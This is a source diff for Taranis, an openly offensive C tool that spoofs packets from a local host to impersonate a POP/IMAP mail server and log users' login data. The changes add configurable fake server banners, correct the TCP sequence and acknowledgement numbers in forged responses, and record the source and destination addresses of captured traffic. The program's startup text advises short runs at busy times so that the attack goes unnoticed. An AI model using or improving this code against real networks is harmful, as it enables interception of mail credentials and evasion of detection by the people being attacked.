@@ -109,9 +109,11 @@ u_int32_t              Dst_ip;
 u_int32_t              Gw_ip;
 u_int32_t              Ms_ip;
 pthread_t              Spoof_thread;
-char                   Pop_banner[] = "+OK POP3 Server\r\n";
+char                   Default_pop_banner[] = "+OK POP3 Server\r\n";
+char                  *Pop_banner = NULL;
 char                   Pop_ok[] = "+OK\r\n";
-char                   Imap_banner[] = "* OK IMAP4rev1 Server\r\n";
+char                   Default_imap_banner[] = "* OK IMAP4rev1 Server\r\n";
+char                  *Imap_banner = NULL;
 int                    Debug_level = 1;
 
 int
@@ -131,24 +133,32 @@ main(int argc, char *argv[])
   char              *pcap_file = NULL;
 
   printf("[*] Taranis starting ... \n");
-  printf("[*] Written by jwilkins@bitland.net, based on an idea by");
-  printf(" jesse@bitland.net\n");
-  printf("[*] Thanks to skyper@segfault.net for all his help\n");
-  printf("[*] Running for extended periods is not advised as no real \n");
+  printf("[*] Code by Jonathan Wilkins <jwilkins@bitland.net>\n");
+  printf("[*] Original idea by Jesse <jesse@bitland.net>\n");
+  printf("[*] Thanks to Skyper <skyper@segfault.net> for all his help\n");
+  printf("[*]\n");
+  printf("[*] NOTE: Running for extended periods is not advised as no real \n");
   printf("    connections to the target server will be possible.  This will\n");
   printf("    be noticed.  Running for short periods, at high traffic times\n");
   printf("    such as after lunch, is recommended\n");
+  printf("[*]\n");
   printf("[*] Using libpcap version %s\n", pcap_version);
 
   /* seed libnet random number generator */
   libnet_seed_prand();
 
   /* get command line parameters */
-  while((arg = getopt(argc, argv, "l:s:d:i:m:g:e:h?")) != EOF){
+  while((arg = getopt(argc, argv, "I:P:l:s:d:i:m:g:e:h?")) != EOF){
     switch(arg){
       case 'l': /* Specify log file name */
                 Log_file = optarg;
                 break;
+      case 'I': /* Specify IMAP banner */
+                Imap_banner = optarg;
+                break;
+      case 'P': /* Specify POP banner*/
+                Pop_banner = optarg;
+                break;
       case 'i': /* Specify ethernet interface */
                 Interface = optarg;
                 break;
@@ -187,6 +197,14 @@ main(int argc, char *argv[])
     Log_file = Default_log_file;
   }
 
+  /* Banner stuff */
+  if(!Pop_banner){
+    Pop_banner = Default_pop_banner;
+  }
+  if(!Imap_banner){
+    Imap_banner = Default_imap_banner;
+  }
+
   /* Initialize packet capture */
   if(!Interface){
     Interface = pcap_lookupdev(pcap_errbuf);
@@ -222,6 +240,7 @@ main(int argc, char *argv[])
   printf("[*] Ethernet address is %s\n", ether_ntoa(My_MAC_addr));
 
   printf("[*] Target's ethernet address is %s\n", ether_ntoa(&Dst_MAC_addr));
+  printf("[*] Target's IP address is %s\n", ip_ntoa(Ms_ip));
 
   /* create a thread to send the spoofed packets */
   if(pthread_create(&Spoof_thread, NULL, &spoof, NULL)){
@@ -434,8 +453,7 @@ process_ip(u_char *packet, int len)
       if(Debug_level > 2)
         printf("[process_ip] - tcpdatalen = %d\n", tcpdatalen);
 
-      save_packet_content((u_int32_t *)iph->ip_src.s_addr, 
-                          (u_int32_t *)iph->ip_dst.s_addr,
+      save_packet_content(iph->ip_src, iph->ip_dst,
                           tcph->th_sport, tcph->th_dport, 
                           tcpdata, tcpdatalen);
       /* if it's a pop USER command, we send an OK packet */
@@ -625,7 +643,7 @@ send_packet(u_char *packet, int len)
 }
 
 void
-save_packet_content(u_int32_t *sip, u_int32_t *dip, 
+save_packet_content(struct in_addr sip, struct in_addr dip, 
                     u_int16_t sp, u_int16_t dp,
                     u_char *data, int len)
 {
@@ -637,8 +655,9 @@ save_packet_content(u_int32_t *sip, u_int32_t *dip,
     return;
   }
 
-  fprintf(log, "%s:%d",   "source", sp);
-  fprintf(log, "->%s:%d : ", "dest", dp);
+  printf("[save_packet_content] - len is %d\n", len);
+  fprintf(log, "%s:%d",      inet_ntoa(sip), ntohs(sp));
+  fprintf(log, "->%s:%d : ", inet_ntoa(dip), ntohs(dp));
   fwrite(data, len, 1, log);
   fprintf(log, "\n");
 
@@ -664,10 +683,10 @@ send_pop_banner(u_char *packet, int len)
 
   header_len = (Pcap_media_offset + (iph->ip_hl*4) + (tcph->th_off*4));
 
-  new_packet_len = (header_len + sizeof(Pop_banner) - 1);
+  new_packet_len = (header_len + strlen(Pop_banner));
   new_packet = (u_char *)calloc(1, new_packet_len);
   memcpy(new_packet, packet, header_len);
-  memcpy(&new_packet[header_len], Pop_banner, sizeof(Pop_banner)-1);
+  memcpy(&new_packet[header_len], Pop_banner, strlen(Pop_banner));
 
   iph  = (struct ip *)(new_packet+Pcap_media_offset);
   tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));
@@ -729,6 +748,7 @@ send_pop_ok(u_char *packet, int len)
   struct ip           *iph;
   struct tcphdr       *tcph;
   u_int32_t            tmp_int;
+  u_int32_t            tmp_ack;
   u_int16_t            random1;
   u_int16_t            tmp_short;
   int                  x, tcp_options_start, tcp_options_len;
@@ -760,13 +780,12 @@ send_pop_ok(u_char *packet, int len)
   tmp_short += strlen(Pop_ok);
   iph->ip_len = htons(tmp_short);
 
-  /* increment seq # */
+  /* adjust sequence # and ack # */
   tmp_int = ntohl(tcph->th_seq);
   tmp_int += data_len;
+  tmp_ack = tcph->th_ack;
   tcph->th_ack = htonl(tmp_int);
-
-  /* increment our sequence number */
-  tcph->th_seq = ntohl(OSYN + 1 + sizeof(Pop_banner) - 1);
+  tcph->th_seq = tmp_ack;
 
   /* make up an IP ID */
   random1 = libnet_get_prand(LIBNET_PRu16);
@@ -813,10 +832,10 @@ send_imap_banner(u_char *packet, int len)
   u_int16_t            tmp_short;
   int                  x, tcp_options_start, tcp_options_len;
 
-  new_packet_len = len + sizeof(Imap_banner)-1;
+  new_packet_len = len + strlen(Imap_banner);
   new_packet = (u_char *)calloc(1, new_packet_len);
   memcpy(new_packet, packet, len);
-  memcpy(&new_packet[len], Imap_banner, sizeof(Imap_banner)-1);
+  memcpy(&new_packet[len], Imap_banner, strlen(Imap_banner));
 
   iph  = (struct ip *)(new_packet+Pcap_media_offset);
   tcph = (struct tcphdr *)(new_packet+Pcap_media_offset+(iph->ip_hl * 4));
@@ -882,6 +901,8 @@ print_usage(char *name)
   printf("  -m\t\tip address of mail server (required)\n");
   printf("  -l\t\tfile name for log\n");
   printf("  -e\t\tethernet address of mail server (required)\n");
+  printf("  -P\t\tspecify POP banner to send to clients\n");
+  printf("  -I\t\tspecify IMAP banner to send to clients\n");
   printf("Example:\n");
   printf("./%s -m 10.0.0.90 -e 00:a0:cc:3b:af:bd\n", name);
 }
